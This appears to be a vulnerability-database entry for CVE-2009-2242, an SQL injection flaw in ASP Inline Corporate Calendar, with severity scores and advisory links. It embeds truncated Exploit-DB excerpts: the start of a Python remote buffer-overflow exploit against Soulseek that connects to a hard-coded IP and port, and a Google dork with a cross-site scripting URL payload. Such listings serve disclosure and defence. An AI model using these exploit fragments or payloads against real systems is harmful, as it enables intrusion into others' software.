CVE-2009-2242
Published 2009-06-27
Priority P3 38 · medium · 6.8 CVSS 2.0
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.91% (55.6th percentile)
SQL injection vulnerability in active_appointments.asp in ASP Inline Corporate Calendar allows remote attackers to execute arbitrary SQL commands via the order parameter.
No detection rules found.
Exploit-DB
Soulseek 157 NS - Remote Buffer Overflow (SEH)
exploitdb·2009-05-26
CVE-2009-1830 Soulseek 157 NS - Remote Buffer Overflow (SEH)
---
#!/usr/bin/python
#[x] Bug :Soulseek 157 NS Remote Seh Overwrite Exploit
#[x] Credits & poc from : http://www.milw0rm.com/exploits/8777
#[x] Tested on : Windows Xp (sp3), Soulseek 157 NS 12d
#[x] The exploit attacks the user :"test4321"
import struct
import sys, socket
from time import *
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch
request = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00"
request += "testt4321" # username
request += "\x08\x00\x00\x00"
request += "12345678" # password
request += "\xb5\x00\x00\x00\x20\x00\x00\x00"
request += "\x38\x65\x39\x31\x66\x37\x33\x30\x35\x35\x37\x31\x32\x35\x64\x37"
request += "\x34\x39\x32\x34\x62\x64\x66\x35\x6
Exploit-DB
asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting
exploitdb·2009-05-21
CVE-2009-2243 asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting
---
[+] Script : ASP Talk
[+] Exploit Type : Multiple Exploits (SQL/CSS)
[+] Google Dork : intitle:"ASP inline corporate calendar" inurl:.asp?id=
[+] Contact : blackbeard-sql A.T hotmail.fr
--//--> Exploit :
1)Cross site scripting :
http://[website]/[script]/search.asp?keyword=alert('bl@ckbe@rd');&Searc
No writeups or analysis indexed.
http://secunia.com/advisories/35187
http://www.exploit-db.com/exploits/8756
http://www.securityfocus.com/bid/35054
https://exchange.xforce.ibmcloud.com/vulnerabilities/50667
Published: 2009-06-27